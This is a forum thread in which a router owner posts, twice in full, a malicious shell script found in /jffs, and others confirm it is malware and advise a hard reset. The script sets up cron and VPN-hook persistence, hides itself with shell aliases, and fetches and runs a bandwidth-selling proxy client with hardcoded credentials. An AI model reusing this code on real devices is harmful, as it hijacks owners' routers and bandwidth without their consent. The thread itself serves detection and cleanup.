Menu
What's new
By:
Filters Better Search

Malware /jffs/updater script.

  • SNBForums Code of Conduct

    SNBForums is a community for everyone, no matter what their level of experience.

    Please be tolerant and patient of others, especially newcomers. We are all here to share and learn!

    The rules are simple: Be patient, be nice, be helpful or be gone!

Swistheater

Swistheater

Very Senior Member
What is this random /jffs/updater script?

Bash: 
#!/bin/sh

if ls /jffs/p32
then
    exit
fi

cru a updater "* * * * * /jffs/updater"

nvram set vpn_server1_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server1_state | grep 2
then
    echo ""
else
    nvram set vpn_server1_state=2
    nvram set vpn_server1_nm=255.255.255.0
    nvram set vpn_server1_local=10.8.0.1
    nvram set vpn_server1_hmac=-1
    nvram set vpn_server1_errno=0
    nvram set vpn_server1_rgw=0
    nvram set vpn_server1_poll=0
    nvram set vpn_server1_reneg=-1
    nvram set vpn_server1_r1=192.168.1.50
    nvram set vpn_server1_r2=192.168.1.55
    nvram set vpn_server1_pdns=0
    nvram set vpn_server1_if=tun
    nvram set vpn_server1_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server1_remote=10.8.0.2
    nvram set vpn_server1_comp=yes
    nvram set vpn_server1_tls_keysize=0
    nvram set vpn_server1_firewall=auto
    nvram set vpn_server1_ccd=0
    nvram set vpn_server1_sn=10.8.0.0
    nvram set vpn_server1_digest=SHA1
    nvram set vpn_server1_c2c=0
    nvram set vpn_server1_state=2
    nvram set vpn_server1_crypt=tls
    nvram set vpn_server1_plan=1
    nvram set vpn_server1_ccd_excl=0
    nvram set vpn_server1_proto=udp
    nvram set vpn_server1_igncrt=0
    nvram set vpn_server1_cipher=AES-128-CBC
    nvram set vpn_server1_dhcp=1
    nvram set vpn_server1_port=31194
fi

nvram set vpn_server_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server_state | grep 2
then
    echo ""
else
    nvram set vpn_server_state=2
    nvram set vpn_server_nm=255.255.255.0
    nvram set vpn_server_local=10.8.0.1
    nvram set vpn_server_hmac=-1
    nvram set vpn_server_errno=0
    nvram set vpn_server_rgw=0
    nvram set vpn_server_poll=0
    nvram set vpn_server_reneg=-1
    nvram set vpn_server_r1=192.168.1.50
    nvram set vpn_server_r2=192.168.1.55
    nvram set vpn_server_pdns=0
    nvram set vpn_server_if=tun
    nvram set vpn_server_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server_remote=10.8.0.2
    nvram set vpn_server_comp=yes
    nvram set vpn_server_tls_keysize=0
    nvram set vpn_server_firewall=auto
    nvram set vpn_server_ccd=0
    nvram set vpn_server_sn=10.8.0.0
    nvram set vpn_server_digest=SHA1
    nvram set vpn_server_c2c=0
    nvram set vpn_server_state=2
    nvram set vpn_server_crypt=tls
    nvram set vpn_server_plan=1
    nvram set vpn_server_ccd_excl=0
    nvram set vpn_server_proto=udp
    nvram set vpn_server_igncrt=0
    nvram set vpn_server_cipher=AES-128-CBC
    nvram set vpn_server_dhcp=1
    nvram set vpn_server_port=31723
fi

nvram set jffs2_exec='ash /jffs/updater'
nvram set script_usbmount='ash /jffs/updater'
nvram set script_usbumount='ash /jffs/updater'

nvram commit

if cat ~/.profile | grep "alias ls='f()"
then
    echo ""
else
    echo "alias ls='f(){ ls \"\$@\" | grep -v updateservice | grep -v updater | grep -v .profile; unset -f f; }; f'" >> ~/.profile
    echo "alias ps='f(){ ps \"\$@\" | grep -v updateservice | grep -v updater; unset -f f; }; f'" >> ~/.profile
    echo "alias cat='f(){ cat \"\$@\" | grep -v updater | grep -v updateservice; unset -f f; }; f'" >> ~/.profile
fi

if ps | grep updateservice | grep -v grep
then
        echo "Running"
else
        if test -s /tmp/updateservice
        then
                echo " "
        else
        rm /tmp/updateservice
                if cat /proc/cpuinfo | grep -i ARMv7
                then
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli
                        chmod u+x /tmp/updateservice
                fi
        fi
        if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
                echo " "
        else
                rm /tmp/updateservice
                wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
                chmod u+x /tmp/updateservice
                if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
            echo " "
        else
            rm /tmp/updateservice
                    wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv6l/pawns-cli
                    chmod u+x /tmp/updateservice
                    if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            then
                echo " "
            else
                rm /tmp/updateservice
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_aarch64/pawns-cli
                        chmod u+x /tmp/updateservice
                        /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            fi
        fi
        fi
fi

Code: 
* * * * * /jffs/updater #updater#

@RMerlin is this a default script?
 
Last edited:
There have been a few other reports of this recently and RMerlin confirmed it was malware. Fortunately the router's asd process should stop the worst of it until such a time that you can perform the hard reset.
 
ColinTaylor said:
There have been a few other reports of this recently and RMerlin confirmed it was malware. Fortunately the router's asd process should stop the worst of it until such a time that you can perform the hard reset.
Click to expand...
Should I reflash firmware after resetting?
 
ColinTaylor said:
I don't know how the malware gets onto the router but my guess is that a hard reset alone should be sufficient to get rid of it.
Click to expand...
You were correct! Thanks so much for your value input. I was a little taken back when I saw CPU spikes and a script running in the background over wget to some unknown server. I hard reset all the routers on my network. Re-configured from scratch. It says the file had been there since the 5th of this month.
 
Good to hear you fixed it.

I suppose the bigger question is how it got onto the router in the first place. If we don't know that it's possible that it might come back again. Do you have any router services exposed to the internet, e.g. Web or SSH?
 
ColinTaylor said:
Good to hear you fixed it.

I suppose the bigger question is how it got onto the router in the first place. If we don't know that it's possible that it might come back again. Do you have any router services exposed to the internet, e.g. Web or SSH?
Click to expand...
No. That is why it was so alarming because I don't even have my VPN services turned on ATM. Yet there is a script running "updates" on a VPN server.
 
@ColinTaylor

Would it be safe to block these on the firewall?

Code: 
download.iproyal.com
proton.me

they are in the malware script above.
 
Swistheater said:
It says the file had been there since the 5th of this month.
Click to expand...
Be careful with the date. 5th of May 2018 is the default date the router uses when it boots up before it's got the correct date from NTP. So many files have this timestamp.
 
ColinTaylor said:
Be careful with the date. 5th of May 2018 is the default date the router uses when it boots up before it's got the correct date from NTP. So many files have this timestamp.
Click to expand...
actually it is may 2nd I read the wrong file but the date stamp is accurate.
 
This is a interesting thread. Being these routers are manufactured for China one has to wonder if there is some sort of data collection going on. After all China and the US are not on good terms right now. Remember the spy balloon crossing the US. Stange days indeed.
 
J23 said:
This is a interesting thread. Being these routers are manufactured for China one has to wonder if there is some sort of data collection going on. After all China and the US are not on good terms right now. Remember the spy balloon crossing the US. Stange days indeed.
Click to expand...
There's nothing to suggest this has any connection to China. Looks like normal criminal malware.
 
Can this malware script run on Asuswrt as well or needs Asuswrt-Merlin?
 
Interesting subject, but how did this script end up on the router? Without user intervention, is it possible?

This link in the script points to Pawns.app (proxy service):

Code: 
hxxps://download.iproyal.com/pawns-cli/latest/linux_armv6l/pawns-cli

It seems to be a way to use internet bandwidth, explained here:

Code: 
https://peppe8o.com/pawns-raspberry-pi-passive-income/

The email account, comes from this service (eg. also have vpn service):

Code: 
https://proton.me/mail
 
Swistheater said:
What is this random /jffs/updater script?

Bash: 
#!/bin/sh

if ls /jffs/p32
then
    exit
fi

cru a updater "* * * * * /jffs/updater"

nvram set vpn_server1_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server1_state | grep 2
then
    echo ""
else
    nvram set vpn_server1_state=2
    nvram set vpn_server1_nm=255.255.255.0
    nvram set vpn_server1_local=10.8.0.1
    nvram set vpn_server1_hmac=-1
    nvram set vpn_server1_errno=0
    nvram set vpn_server1_rgw=0
    nvram set vpn_server1_poll=0
    nvram set vpn_server1_reneg=-1
    nvram set vpn_server1_r1=192.168.1.50
    nvram set vpn_server1_r2=192.168.1.55
    nvram set vpn_server1_pdns=0
    nvram set vpn_server1_if=tun
    nvram set vpn_server1_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server1_remote=10.8.0.2
    nvram set vpn_server1_comp=yes
    nvram set vpn_server1_tls_keysize=0
    nvram set vpn_server1_firewall=auto
    nvram set vpn_server1_ccd=0
    nvram set vpn_server1_sn=10.8.0.0
    nvram set vpn_server1_digest=SHA1
    nvram set vpn_server1_c2c=0
    nvram set vpn_server1_state=2
    nvram set vpn_server1_crypt=tls
    nvram set vpn_server1_plan=1
    nvram set vpn_server1_ccd_excl=0
    nvram set vpn_server1_proto=udp
    nvram set vpn_server1_igncrt=0
    nvram set vpn_server1_cipher=AES-128-CBC
    nvram set vpn_server1_dhcp=1
    nvram set vpn_server1_port=31194
fi

nvram set vpn_server_custom='up "/bin/sh /jffs/updater"
script-security 3'
if nvram get vpn_server_state | grep 2
then
    echo ""
else
    nvram set vpn_server_state=2
    nvram set vpn_server_nm=255.255.255.0
    nvram set vpn_server_local=10.8.0.1
    nvram set vpn_server_hmac=-1
    nvram set vpn_server_errno=0
    nvram set vpn_server_rgw=0
    nvram set vpn_server_poll=0
    nvram set vpn_server_reneg=-1
    nvram set vpn_server_r1=192.168.1.50
    nvram set vpn_server_r2=192.168.1.55
    nvram set vpn_server_pdns=0
    nvram set vpn_server_if=tun
    nvram set vpn_server_custom=up "/bin/sh /jffs/updater"
    nvram set vpn_server_remote=10.8.0.2
    nvram set vpn_server_comp=yes
    nvram set vpn_server_tls_keysize=0
    nvram set vpn_server_firewall=auto
    nvram set vpn_server_ccd=0
    nvram set vpn_server_sn=10.8.0.0
    nvram set vpn_server_digest=SHA1
    nvram set vpn_server_c2c=0
    nvram set vpn_server_state=2
    nvram set vpn_server_crypt=tls
    nvram set vpn_server_plan=1
    nvram set vpn_server_ccd_excl=0
    nvram set vpn_server_proto=udp
    nvram set vpn_server_igncrt=0
    nvram set vpn_server_cipher=AES-128-CBC
    nvram set vpn_server_dhcp=1
    nvram set vpn_server_port=31723
fi

nvram set jffs2_exec='ash /jffs/updater'
nvram set script_usbmount='ash /jffs/updater'
nvram set script_usbumount='ash /jffs/updater'

nvram commit

if cat ~/.profile | grep "alias ls='f()"
then
    echo ""
else
    echo "alias ls='f(){ ls \"\$@\" | grep -v updateservice | grep -v updater | grep -v .profile; unset -f f; }; f'" >> ~/.profile
    echo "alias ps='f(){ ps \"\$@\" | grep -v updateservice | grep -v updater; unset -f f; }; f'" >> ~/.profile
    echo "alias cat='f(){ cat \"\$@\" | grep -v updater | grep -v updateservice; unset -f f; }; f'" >> ~/.profile
fi

if ps | grep updateservice | grep -v grep
then
        echo "Running"
else
        if test -s /tmp/updateservice
        then
                echo " "
        else
        rm /tmp/updateservice
                if cat /proc/cpuinfo | grep -i ARMv7
                then
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv7l/pawns-cli
                        chmod u+x /tmp/updateservice
                fi
        fi
        if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
                echo " "
        else
                rm /tmp/updateservice
                wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv5l/pawns-cli
                chmod u+x /tmp/updateservice
                if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
        then
            echo " "
        else
            rm /tmp/updateservice
                    wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_armv6l/pawns-cli
                    chmod u+x /tmp/updateservice
                    if /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            then
                echo " "
            else
                rm /tmp/updateservice
                        wget --no-check-certificate -O /tmp/updateservice https://download.iproyal.com/pawns-cli/latest/linux_aarch64/pawns-cli
                        chmod u+x /tmp/updateservice
                        /tmp/updateservice -email=webupdate@proton.me -password=AutoUpdate1! -device-name=`nvram get lan_hwaddr` -accept-tos
            fi
        fi
        fi
fi

Code: 
* * * * * /jffs/updater #updater#

@RMerlin is this a default script?
Click to expand...
Wow. Did you just happen to find this sitting under the /jffs folder after noticing wget commands? Were you watching htop? How did you find it?
 
You must log in or register to reply here.

Similar threads

cyruz
Simple script for DNS fallback
Replies
8
Views
724
cyruz
cyruz
T
MiniUPnPd problem (solved & helper script)
Replies
3
Views
2K
The Chief
T
Laxarus
Custom Script syntax error
Replies
2
Views
765
Laxarus
Laxarus
bbeny123
Tutorial Debian 12 Bookworm + Plex Media Server (Asus RT-AX86S)
2
Replies
22
Views
4K
Rexawl
Rexawl
Karl Perkins
Suggested upnp.postconf, so that /jffs/config/upnp.add actually works as you think it should
Replies
2
Views
1K
Karl Perkins
Karl Perkins
Similar threads
Thread starter Title Forum Replies Date
edgezero manually update /jffs/nvram/filter_lwlist Asuswrt-Merlin 2
A /jffs/.asdbk/main_checker.sh_bk growing Asuswrt-Merlin 6
ADDon88 "Format JFFS partition at next boot" not an option on RT-AX88U Pro Asuswrt-Merlin 5
BeKozGaming [RT-AC88U][386.12_4] "backup_jffs.tar Failed - Virus detected" Error saving JFFS partition: Trojan:Script/Wacatac.B!ml Asuswrt-Merlin 11
alan6854321 Saved settings and jffs get blocked by Chrome & Windows security Asuswrt-Merlin 13
complexxL9 RT-AX88U Pro - 3004.388.4 - DHCP stops working after enabling JFFS Asuswrt-Merlin 2
XIYO Solved The settings in /jffs/config/ are not being applied. Asuswrt-Merlin 2
Nas.CloudBusinessPortal reformatting jffs missing Asuswrt-Merlin 16
puremind jffs partition is read-only and cannot format-restore Asuswrt-Merlin 53

Similar threads

Latest threads

Sign Up For SNBForums Daily Digest

Get an update of what's new every day delivered to your mailbox. Sign up here!

Members online

Total: 875 (members: 18, guests: 857)
Top